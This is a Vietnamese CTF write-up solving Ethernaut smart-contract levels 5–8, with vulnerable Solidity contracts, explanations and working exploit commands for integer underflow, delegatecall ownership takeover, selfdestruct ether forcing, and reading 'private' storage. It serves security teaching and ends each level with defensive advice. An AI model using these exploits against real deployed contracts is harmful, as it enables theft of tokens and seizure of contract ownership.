+8

Blockchain - hacking smart contract with Ethernaut CTF (Part 2)

Chào các bạn, hôm nay chúng ta sẽ đến với phần 2 của chuỗi bài Blockchain - hacking smart contract with Ethernaut CTF

Ở bài trước, chúng ta đã được tiếp cận với những lỗ hổng cơ bản và dễ dàng nhất, ở phần này chúng ta sẽ tiếp cận 4 lỗ hổng khác với độ khó cao hơn, mình sẽ giải thích từng bước cụ thể kèm phân tích để các bạn có thể nắm được trực quan và đơn giản nhất.

Hi vọng sẽ mang lại nhiều điều thú vị cho các bạn.

The Ethernaut: https://ethernaut.zeppelin.solutions/

Một vài recommend:

 • Sẽ tốt hơn nếu bạn có kiến thức về Blockchain và Smart Contract
 • Sẽ tốt hơn nếu bạn có kiến thức về Solidity và Web3js
 • Sẽ là tốt hơn nếu bạn biết cách sử dụng Remix IDE hoặc Truffle

5. Token ★★★☆☆☆

Nhiệm vụ: Có 20 token trong tay, ta cần chôm ở đâu đó vài token nữa (càng nhiều càng tốt)

pragma solidity ^0.4.18;

contract Token {

 mapping(address => uint) balances;
 uint public totalSupply;

 function Token(uint _initialSupply) public {
  balances[msg.sender] = totalSupply = _initialSupply;
 }

 function transfer(address _to, uint _value) public returns (bool) {
  require(balances[msg.sender] - _value >= 0);
  balances[msg.sender] -= _value;
  balances[_to] += _value;
  return true;
 }

 function balanceOf(address _owner) public view returns (uint balance) {
  return balances[_owner];
 }
}

Phân tích

 • Trong các ngôn ngữ lập trình static type như C/C++/C#/Java, có lẽ chúng ta hầu như không xa lạ gì với khái niệm overflow - hiện tượng tràn số khi tính toán số lớn hơn giá trị MAX của kiểu dữ liệu đã khao báo. Nhưng có một khái niệm nữa ít được để ý hơn nhưng cũng vô cùng quan trọng, đó là underflow - hiện tượng mà khi số nhỏ dưới giá trị MIN của kiểu dữ liệu đã khai báo thì số đó sẽ được quay vòng trở lại từ MAX, thật tai hại nếu không handle trường hợp này.
 • Trong bài này, kiểu dữ liệu đang dùng là uint256, giới hạn từ 0 cho tới $ 2^{256} $
 • Ở đây ta có đoạn
require(balances[msg.sender] - _value >= 0);

những tưởng rằng điều kiện này chỉ đạt được khi balance của msg.sender lớn hơn giá trị value; nhưng không, điều kiện này sẽ trở thành auto true. Thật vậy, nếu như balance >= value thì hiển nhiên sẽ là true, còn nếu như balance < value thì khi balance - value sẽ xảy ra hiện tượng underflow và trở nên vô cùng lớn, theo đó điệu kiện cũng sẽ là true. Tóm lại, ta sẽ luôn luôn pass.

Solution

 • Trên Chrome console để kiểm tra balance hiện tại:
await contract.balanceOf(player).then(x => x.toNumber())
20
 • Do điều kiện auto pass, ta sẽ transfer cho một địa chỉ nào đó một giá trị lớn hơn 20 - là số token hiện tại của ta, khi đó phép toán balances[msg.sender] -= value sẽ xảy ra hiện tượng underflow và ta sẽ sở hữu một lượng vô cùng lớn token:
contract.transfer(player, 21)
 • Kiểm tra lại balance một lần nữa, wow !! !
await contract.balanceOf(player).then(x => x.toNumber())
1.157920892373162e+77
 • Submit & all done!

Bình luận

 • Overflow hay Underflow đều nguy hiểm, hãy dùng thư viện Safe Math cho bất cứ phép toán nào của bạn.

6. Delegation ★★★★☆☆

Nhiệm vụ: Chiếm quyền owner.

pragma solidity ^0.4.18;

contract Delegate {

 address public owner;

 function Delegate(address _owner) public {
  owner = _owner;
 }

 function pwn() public {
  owner = msg.sender;
 }
}

contract Delegation {

 address public owner;
 Delegate delegate;

 function Delegation(address _delegateAddress) public {
  delegate = Delegate(_delegateAddress);
  owner = msg.sender;
 }

 function() public {
  if(delegate.delegatecall(msg.data)) {
   this;
  }
 }
}

Phân tích

 • Để từ trong contract này gọi hàm của contract khác, ngoài cách dùng instance của contract khác để gọi, solidity cung cấp cho ta một số hàm low-level khác để thay thế: đó là calldelegatecall. Ngay từ chú thích low-level ta đã biết rằng đây là những hàm nguy hiểm rồi, nên việc hiểu rõ cách sử dụng chúng là một điều tất yếu.
 • Việc giải thích cụ thể về calldelegatecall khá dài và nằm ngoài phạm vi bài viết. Bạn có thể đọc thêm tại đây. Cơ bản thì delegatecall chỉ mượn tên hàm của contract khác, mọi thông tin về storage vẫn là storage của contract đang sử dụng.
 • Contract Delegate có hàm pwn() để trao quyền owner, vậy mục tiêu của chúng ta là làm sao để kích hoạt được hàm này.
 • Contract Delegation có fallback function sử dụng delegatecall, nó gợi ý cho chúng ta trigger fallback với msg.data chính là hàm pwn()
 • fallback function trong contract Delegation không có payable, nghĩa là không thể nhận ether, ta vẫn có thể kích hoạt được nó bằng cách send cho nó 0 ether, thật là vi diệu!
 • Về fallback function, các bạn có thể tham khảo thêm tại documentation của Solidity hoặc tại bài viết phần 1
 • Một lưu ý về msg.data: để truyền vào hàm pwn(), ta không phải truyền plain text, mà solidity sẽ gọi bằng bytes4 hash của nó, tức 4 byte đầu của chuỗi hash("pwn()") cụ thể ta sẽ phải truyền vào tham số như sau: web3.sha3("pwn()").slice(0, 10)

Solution

 • Trên Chrome console, kiểm tra contract owner:
await contract.owner()
 • Send 0 ether kèm data để trigger fallback:
await contract.sendTransaction({data:web3.sha3("pwn()").slice(0,10)});
 • Kiểm tra lại contract owner xem đã là mình chưa:
await contract.owner()
 • Submit & all done!

Bình luận

7. Force ★★★★★☆

Nhiệm vụ: Bằng cách nào đó chuyển cho một contract rỗng một ít ether.

pragma solidity ^0.4.18;

contract Force {/*

          MEOW ?
     /\_/\  /
  ____/ o o \
 /~____ =ø= /
 (______)__m_m)

*/}

Phân tích

 • Contract không tí code nào - wtf ?
 • Đây là một bài thuộc dạng bài biết thì rất dễ, không biết thì không biết đằng nào mà lần. Điều ta cần biết duy nhất chính là hàm selfdestruct.
 • Với một contract, khi gọi hàm selfdestruct(someone_addr) thì contract sẽ hủy và toàn bộ tiền của contract sẽ gửi về someone_addr, đây có thể là địa chỉ bất kì của người dùng hoặc của contract nào đó.

Solution

 • Trên Remix IDE, chuẩn bị một contract có thể gửi tiền vào, và một hàm thực hiện selfdestruct trong đó, nhớ thay địa chỉ trong selfdestruct bằng địa chỉ instance của bạn:
contract AnotherContract {
  
  function sendAll() public {
    // replace by your instance address
    selfdestruct(0xb3a12d511131ada7a145a5a9dc7399756cae6c4b);
  }
  
  function() public payable {
    
  }
}
 • Compile & send cho AnotherContract vài ether.
 • Gọi hàm sendAll() để hủy contract & gửi tiền vào contract đề bài yêu cầu.
 • Submit & all done!

Bình luận

 • Bình luận gì nữa, cần phải tìm hiểu thêm nhiều thôi (okay).

8. Vault ★★★☆☆☆

Nhiệm vụ: Tìm password và unlock

pragma solidity ^0.4.18;

contract Vault {
 bool public locked;
 bytes32 private password;

 function Vault(bytes32 _password) public {
  locked = true;
  password = _password;
 }

 function unlock(bytes32 _password) public {
  if (password == _password) {
   locked = false;
  }
 }
}

Phân tích

 • Ta biết rằng blockchain là minh bạch, và mọi thông tin trên đó ta đều có thể nhìn thấy được, kể cả những biến khai báo là private. Và trong bài này, điều đó không là ngoại lệ.
 • web3js cung cấp cho ta một hàm web3.eth.getStorageAt để lấy thông tin trên blockchain. Ta sẽ dùng nó để tìm password.

Solution

 • Contract Vault có 2 tham số: lookedpassword, nó sẽ lưu looked tại vị trí 0 và password tại vị trí 1 trong storage.
 • password có kiểu dữ liệu là bytes32, nên để hiển thị ra ký tự ASCII ta phải dùng hàm web3.toAscii
 • Trong chrome console, ta chạy lệnh sau
web3.eth.getStorageAt("0x712d4d349abd61d1ff12be06f8ff55cc7fb1052b", 1, (err, result) => alert(web3.toAscii(result)))
 • Yeah, ta nhận được password là: A very strong secret password :)
 • Tiến hành unlock:
await contract.unlock('A very strong secret password :)');
 • Kiểm tra lại tình trạng khóa:
await contract.locked.call();
false
 • Submit & all done!

Bình luận

 • private trong blockchain hay solidity nói riêng chỉ là một phương thức để ngăn quyền truy xuất trong contract mà thôi, chứ không có nghĩa là nó bí mật đối với người dùng.
 • Nếu muốn thông tin private, hãy mã hóa nó trước khi đưa lên blockchain.
 • Không nên lưu trữ các thông tin nhạy cảm trên blockchain, dù nó có được mã hóa hay không.

Conclusion

Vậy là chúng ta đã đi qua được 2/3 chặng đường, chúc các bạn có những giây phút vui vẻ.

Enjoy coding!

References


All Rights Reserved

Viblo
Let's register a Viblo Account to get more interesting posts.